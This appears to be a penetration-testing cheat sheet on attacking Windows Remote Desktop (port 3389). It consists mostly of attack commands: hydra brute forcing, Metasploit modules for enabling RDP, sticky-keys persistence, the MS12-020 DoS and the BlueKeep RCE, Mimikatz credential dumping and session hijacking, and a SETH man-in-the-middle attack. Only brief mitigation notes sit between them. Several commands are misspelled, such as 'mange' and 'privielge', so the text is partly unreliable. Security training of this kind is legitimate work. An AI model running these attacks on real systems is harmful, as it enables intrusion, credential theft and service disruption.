https://www.hackingarticles.in/remote-desktop-penetration-testing-port-3389/
Remote Desktop Penetration Testing (Port 3389)

Nmap Port Scan
nmap -A -p3389 192.168.1.41

Login Bruteforce
hydra -L user.txt -P pass.txt 192.168.1.41 rdp

Mitigation Against Bruteforce
User Lockout policy
----------------------------------------------------
Post Exploitation using Metasploit
run getgui -e -u ignite -p 123

use post/windows/mange/enable_rdp
set username pavan
set password 123
set session 1
exploit
--------------------------------------------------
Persistence
use post/windows/manage/sticky_keys
set session 1
exploit

Credential Dumping -Mimikatz
privielge::debug
ts::mstsc            (ts::mstsc can be used to extract cleartext credentials from the mstsc process (client side). 
--------------------------------------------------------------------------------------------------------------
Session Hijacking
list all the active sessions. 
privilege::debug
ts::sessions

connect to that particular session
token::elevate
ts::remote /id:3

Mitigation against Session Hijacking
Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host > Session Time Limits.
When implemented, these policies will restrict the one necessity required by the session hijacking i.e., Active User Session. Hence, mitigation the possibility of Session Hijacking altogether.
--------------------------------------------------------
DoS Attack (MS12-020 Free DoS)

use auxiliary/scanner/rdp/ms12_020_check
set rhosts 192.168.1.21
exploit
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhosts 192.168.1.21
exploit
-----------------------------------------------
Exploitation: BlueKeep
BlueKeep was a security vulnerability that was discovered in Remote Desktop Protocol implementation that can allow the attacker to perform remote code execution. 
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.1.16
exploit

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.1.16
set target 5
exploit
sysinfo
-----------------------------------------------------------
Changing the RDP Port _ Mitigation

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

Change it to another value and save your changes and now the RDP will be running on the specified port - Port Number

---------------------------------------------------------------------------------------------------------------------

Man-in-the-Middle Attack: SETH
Tools can be used to perform this kind of attack but the SETH toolkit is the one that seems elegant. We start with cloning it directly from its GitHub Repository and then installing some pre-requirements.
git clone https://github.com/SySS-Research/Seth.git
cd Seth
pip install -r requirements.txt
apt install dsniff

After the installation, to mount the attack, we require the local IP Address, Target IP Address, and the Network Interface that will be used. In this case, it is eth0. 
Here we see that the attack has been mounted and is ready for the victim.

/seth.sh eth0 192.168.1.5 192.168.1.3 192.168.1.41
